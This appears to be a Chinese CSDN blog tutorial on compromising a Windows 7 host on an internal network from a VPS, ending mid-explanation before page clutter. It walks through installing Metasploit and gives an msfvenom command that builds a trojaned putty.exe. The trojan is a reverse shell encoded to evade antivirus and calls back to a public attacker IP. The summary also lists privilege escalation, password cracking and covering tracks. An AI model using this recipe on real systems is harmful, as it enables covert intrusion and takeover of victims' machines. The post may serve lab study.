vps渗透内网win7主机

本文档详细介绍了如何利用VPS渗透进入Win7内网主机的过程,包括环境设定、攻击拓扑图、VPS配置、木马生成、Meterpreter shell获取、提权、密码获取、端口映射、清除痕迹等步骤。涉及到的工具包括Metasploit、CVE-2018-8120提权工具、Saminside等。
摘要由CSDN通过智能技术生成

准备

环境:

win7:192.168.123.233
centos7:45.77.179.138(为做实验临时申请注册公网ip)
攻击:
Metasploit渗透框架
Cve-2018-8120本地提权执行文件
Windows exploit sugger(漏洞利用建议器)
Putty执行文件
Lcx (windows下端口转发工具)
Portmap (linux下端口转发工具)
Saminside (破解系统用户密码)

攻击拓扑图

原图

vps配置攻击环境:

centos7安装metasploit

apt-get install curl,wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
                          //成功安装后请运行下属代码,以使下载的最新版本的msf连接数据库。
adduser msf               //添加msf用户,这里会提示输入新添账号的密码
su msf                    //切换用户为msf
./msfconsole

效果

生成木马并绑定程序(也可以用shellter给程序绑定木马,看个人习惯):

msfvenom -p windows/shell_reverse_tcp LHOST=45.77.179.138 LPORT=8001 -e x86/shikata_ga_nai -x putty.exe  -k -i 5 -f exe -o backdoor.exe
msfvenom -p windows/shell_reverse_tcp 意为使用shell_reverse_tcp攻击载荷
LHOST=45.77.179.138 此步是设置攻击者IP地址
LPORT=8001 此步是设置木马将会主动连接攻击者设定的监听端口
-e x86/shikata_ga_nai 此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码࿰
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值